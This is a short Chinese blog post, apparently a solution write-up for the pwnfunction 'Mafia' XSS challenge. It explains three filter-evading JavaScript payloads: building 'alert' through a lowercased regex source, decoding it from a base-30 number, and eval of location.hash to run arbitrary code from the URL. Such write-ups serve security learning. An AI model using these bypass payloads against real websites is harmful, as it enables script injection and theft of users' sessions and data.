xss.pwnfunction-Mafia

万能小硕2024-04-10 9:44

这个是利用的构造函数 用source来获取构造函数的源码并转化成小写

javascript 复制代码 
Function(/ALERT(1337)/.source.toLowerCase())()

parseInt(string, radix)

  • string:要被解析的字符串。
  • radix:解析时使用的基数(进制)。可选参数,默认为10。

用parseint将alert转成进制

这里为什么用30因为在转换进制的时候是0-9其次才是a-z也就是说他在20位加上0-9正好是30

javascript 复制代码 
eval(8680439..toString(30))(1337)

"location.hash" 是 JavaScript 中用来获取当前页面 URL 中的锚点(即 # 号后面的部分)的属性。通过访问 "location.hash",你可以获取当前页面 URL 中的锚点信息

"slice" 是 JavaScript 中用来提取字符串中指定部分的方法。

javascript 复制代码 
eval(location.hash.slice(1))
相关推荐
我材不敲代码15 小时前
Python 函数核心:位置参数与关键字参数详解
java·前端·python
Kratzdisteln15 小时前
【无标题】
前端·python
Curvatureflight16 小时前
前端国际化 i18n 落地实践:语言包、动态文案和格式化问题怎么处理?
前端·c++·vue
kTR2hD1qb16 小时前
Claude Code Skill的介绍与使用
java·前端·数据库·人工智能
修己xj17 小时前
打造专属博文封面神器:一个开源免费的博文封面生成器ThisCover
前端
kyriewen17 小时前
面试8家前端岗位后,我发现了一个残酷的事实:AI不是加分项,是门槛
前端·javascript·面试
Fighting_p17 小时前
【面试 - el-select问题及解决】wujie 微前端下子系统 el-select 多选 filterable 过滤失效
前端
吃口巧乐兹17 小时前
AI 全栈时代,为什么要服务端使用 NestJs
前端
yingyima17 小时前
Redis 延迟任务队列:凌晨3点服务器报警的救星
前端
weiggle17 小时前
第三篇:可组合函数(Composable)——Compose 的基石
android·前端
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03【AI】2026 年具身智能模型和世界模型总结04Codex 接入 DeepSeek API 完整配置文档05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出